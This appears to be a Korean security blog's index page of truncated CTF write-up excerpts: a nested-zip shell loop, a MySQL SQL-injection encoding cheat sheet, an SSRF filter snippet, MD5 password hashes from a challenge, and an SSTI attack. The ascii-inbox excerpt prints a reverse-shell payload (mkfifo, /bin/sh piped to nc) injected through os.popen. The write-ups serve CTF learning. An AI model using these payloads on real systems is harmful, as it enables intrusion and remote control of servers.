LAYER7 CTF Writeup - as3617 mic check - MISC (100pts) 개발자도구로 description 영역을 확인해보면 플래그가 있다. FLAG : LAYER7{SunriNIN73rN3thIGHScHOO1layEr7} zipzipzipzipzip - MISC (100pts) 압축파일을 열어보면 안에 또 압축파일이 있는데 손으로 하기 귀찮아서 shell script로 빠르게 풀었다. while [ "`find . -type f -name '*.zip' | wc -l`" -gt 0 ] do find . -type f -name "*.zip" -exec unzip -- '{}' \; -exec rm -- '{}' \; done 압축파일이 있는 폴더로 가서 위의 스크립트를 실행하면 ..
주석 #, --, /**/ Express string select 0x6162; -> ab select 0b110000101100010; -> ab select char(0x61, 0x62); -> ab select concat(char(0x61), char(0x62)); -> ab select mid(@@version,12,1); -> n /* Using Gadget... */ select 'adm' 'in'; -> admin select 'ad''min'; -> ad'min select unhex(unhex(3631363236333634)); -> abcd Useful Functions 1. string substring(), substr(), mid() # select mid('abcde', 2, ..
보호되어 있는 글입니다.
urlcheck1 - 98 points app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z') def valid_ip(ip): matches = app.re_ip.match(ip) if matches == None: return False ip = list(map(int, matches.groups())) if any(i > 255 for i in ip) == True: return False # Stay out of my private! if ip[0] in [0, 10, 127] \ or (ip[0] == 172 and (ip[1] > 15 or ip[1] < 32)) \ or (ip[0] == 169 and ip[1] == 254) \ or (ip[0]..
Migration 두 개의 링크를 주고 있다. http://migration.sstf.site:5555/ http://migration.sstf.site:7777/ 첫번째 링크에는 register가 포함되있고 두번째 링크는 로그인 후 admin 페이지를 제공해준다. 문제에서 주어진 파일을 보면 user의 정보를 포함하고 있는데 아래와 같이 이루어져 있다. idx user_id password 1 user1 c4ca4238a0b923820dcc509a6f75849b 2 user2 c81e728d9d4c2f636f067f89cc14862c 이때 password는 md5해쉬로 이루어져 있었고 user1의 password가 1인걸로 봐선 나머지 유저의 password도 id에 붙어있는 숫자라는 것을 추측해낼 수..
보호되어 있는 글입니다.
ascii-inbox The problem is giving two websites. 1.https://challs.m0lecon.it:8003/ - Inbox 2.https://challs.m0lecon.it:8004/ - Ascii The discription gave me 404 pages as a hint. I immediately thought of a ssti and tried an attack. I tried reverse shell and I could get shell. https://challs.m0lecon.it:8004/{{url_for.__globals__.os.popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip por..